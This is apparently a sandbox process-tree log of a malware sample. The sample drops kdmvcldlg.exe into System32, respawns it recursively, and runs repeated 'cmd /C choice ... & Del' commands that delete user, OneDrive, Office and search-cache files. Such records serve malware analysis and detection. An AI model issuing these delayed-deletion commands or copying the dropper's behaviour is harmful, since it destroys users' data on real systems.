C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:18044
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI473A.txt"4⤵PID:552
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI475A.txt"4⤵PID:17192
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:384
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI473A.txt"4⤵PID:8608
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17980
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI475A.txt"4⤵PID:17228
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\jawshtml.html"4⤵PID:17304
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:5196
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240426_124230482.html"4⤵PID:17400
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:5988
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml"4⤵PID:17412
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"4⤵PID:17456
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"4⤵PID:17524
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:7884
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml"4⤵PID:17588
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17660
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\msoia.exe_Rules.xml"4⤵PID:17640
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17492
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\office2016setup.exe_Rules.xml"4⤵PID:17684
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml"4⤵PID:17708
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17356
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml"4⤵PID:17724
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:6024
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml"4⤵PID:17752
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17740
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\alertIcon.png"4⤵PID:17776
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:8612
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppBlue.png"4⤵PID:17792
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:4788
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png"4⤵PID:17844
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:5596
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png"4⤵PID:17868
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:8060
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png"4⤵PID:17916
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:18300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.png"4⤵PID:18012
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17440
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png"4⤵PID:18052
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:6852
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppWhite.png"4⤵PID:18084
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Error.png"4⤵PID:18156
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ErrorPage.html"4⤵PID:18176
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:17364
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png"4⤵PID:18196
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:6960
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMLockedFileToast.png"4⤵PID:18220
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMScanExclusionToast.png"4⤵PID:18244
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoadingPage.html"4⤵PID:18264
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:5220
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png"4⤵PID:18280
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png"4⤵PID:18296
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png"4⤵PID:18312
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaNearing.png"4⤵PID:18328
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\TestSharePage.html"4⤵PID:18344
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"4⤵PID:18364
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Warning.png"4⤵PID:18380
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4704
-
C:\Windows\System32\kdmvcldlg.exeC:\Windows\System32\kdmvcldlg.exe1⤵
- Executes dropped EXE
PID:4820 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588437759047355.txt"2⤵PID:8876
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9084
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438053890026.txt"2⤵PID:8656
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9336
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"2⤵PID:6608
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:7604
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.0.filtertrie.intermediate.txt"2⤵PID:7748
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15308
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.1.filtertrie.intermediate.txt"2⤵PID:5680
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14288
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.2.filtertrie.intermediate.txt"2⤵PID:17452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9812
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"2⤵
- Executes dropped EXE
PID:8132 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588437759047355.txt"3⤵PID:9632
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5872
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438053890026.txt"3⤵PID:10188
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5492
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"3⤵PID:5816
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:17552
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.0.filtertrie.intermediate.txt"3⤵PID:5640
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.1.filtertrie.intermediate.txt"3⤵PID:4048
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:244
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.2.filtertrie.intermediate.txt"3⤵PID:4388
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5764
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"3⤵
- Executes dropped EXE
PID:7648 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588437759047355.txt"4⤵PID:5184
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:8416
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438053890026.txt"4⤵PID:5348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:2400
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"4⤵PID:8
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:5228
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.0.filtertrie.intermediate.txt"4⤵PID:5064
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:1516
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.1.filtertrie.intermediate.txt"4⤵PID:2080
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:6692
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.2.filtertrie.intermediate.txt"4⤵PID:1016
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:10840
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"4⤵
- Executes dropped EXE
PID:5040 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588437759047355.txt"5⤵PID:5404
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:8248
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438053890026.txt"5⤵PID:5400
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:8364
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"5⤵PID:10256
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:13320
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.0.filtertrie.intermediate.txt"5⤵PID:5408
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:15264
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.1.filtertrie.intermediate.txt"5⤵PID:10996
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:8320
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.2.filtertrie.intermediate.txt"5⤵PID:1836
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:6560
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5808 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588437759047355.txt"6⤵PID:9264
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:7228
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438053890026.txt"6⤵PID:7712
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:7524
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"6⤵PID:7108
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:7908
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.0.filtertrie.intermediate.txt"6⤵PID:7704
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:7772
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.1.filtertrie.intermediate.txt"6⤵PID:15076
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:13756
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.2.filtertrie.intermediate.txt"6⤵PID:7528
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:13576
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5264 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588437759047355.txt"7⤵PID:13336
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:1576
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438053890026.txt"7⤵PID:4452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:7984
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"7⤵PID:7700
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:6016
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.0.filtertrie.intermediate.txt"7⤵PID:7956
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:5856
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.1.filtertrie.intermediate.txt"7⤵PID:7684
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:8968
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.2.filtertrie.intermediate.txt"7⤵PID:6228
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:6280
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"7⤵
- Executes dropped EXE
PID:6056 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588437759047355.txt"8⤵PID:12768
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:13948
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438053890026.txt"8⤵PID:14468
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:14564
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"8⤵PID:14312
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:8696
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.0.filtertrie.intermediate.txt"8⤵PID:15112
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:7288
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.1.filtertrie.intermediate.txt"8⤵PID:7008
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:8532
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.2.filtertrie.intermediate.txt"8⤵PID:7336
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:11804
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2628 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588437759047355.txt"9⤵PID:7660
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵PID:12672
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438053890026.txt"9⤵PID:6620
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵PID:14664
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"9⤵PID:6748
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵PID:12668
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.0.filtertrie.intermediate.txt"9⤵PID:7280
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵PID:13952
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.1.filtertrie.intermediate.txt"9⤵PID:14660
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵PID:14036
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8542178-fc89-4241-9f1e-95daa046f115}\0.2.filtertrie.intermediate.txt"9⤵PID:1236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵PID:13968
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"9⤵
- Executes dropped EXE
PID:7064 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"10⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:7964 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"11⤵
- Executes dropped EXE
PID:5548 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"12⤵
- Executes dropped EXE
